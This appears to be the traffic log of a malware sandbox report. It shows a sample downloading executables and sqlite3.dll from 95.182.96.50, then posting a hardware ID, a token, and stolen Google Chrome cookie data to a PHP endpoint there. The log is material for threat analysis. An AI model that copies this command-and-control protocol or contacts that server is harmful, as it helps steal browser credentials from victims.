00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 31 37 38 38 42 38 39 32 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="hwid"1D1788B892973370857647------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build"mainteam------DAECGCGHCGHCAKECBKJK--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 2d 2d 0d 0a Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="message"browsers------JJEGCBGIDHCAKEBGIIDB--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"plugins------ECGDHDHJEBGHJKFIECBG--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIIDHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 2d 2d 0d 0a Data Ascii: ------BKJKEBGDHDAFHJKEGIIDContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------BKJKEBGDHDAFHJKEGIIDContent-Disposition: form-data; name="message"fplugins------BKJKEBGDHDAFHJKEGIID--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFHost: 95.182.96.50Content-Length: 7763Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 95.182.96.50Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4f 44 45 7a 4d 44 41 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 6b 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 7a 41 77 4e 44 6b 35 43 55 35 4a 52 41 6b 31 4d 54 45 39 61 7a 6c 30 56 44 4e 78 4e 31 6c 6d 61 44 46 75 65 46 39 47 55 32 77 77 4e 6b 59 31 56 55 56 66 64 6d 52 68 52 6c 46 79 5a 57 6c 48 53 32 55 78 59 55 52 4f 4f 44 4e 4e 5a 58 5a 6c 52 44 64 51 54 44 46 53 57 6c 68 32 59 54 52 7a 4c 57 35 47 59 7a 6c 33 59 56 46 70 4f 55 78 30 53 32 46 32 64 56 52 4a 59 6d 45 34 54 56 56 72 62 30 64 31 4e 54 68 46 4f 45 55 34 4d 57 64 33 51 6c 39 55 56 30 6f 30 54 6d 63 74 54 47 5a 44 64 6e 70 6f 5a 57 30 33 63 6b 35 79 61 46 70 52 4d 6d 46 48 64 6b 70 61 4f 57 63 79 56 46 6c 6f 63 58 67 79 56 7a 4a 50 4e 45 55 33 64 55 68 52 65 6c 42 72 4d 33 5a 31 54 48 5a 4e 54 48 68 47 57 46 70 7a 63 55 55 32 54 6d 52 42 56 6d 6c 52 52 45 56 44 52 33 42 76 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlF
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file"------IJDHDGDAAAAKFIDGHJDG--
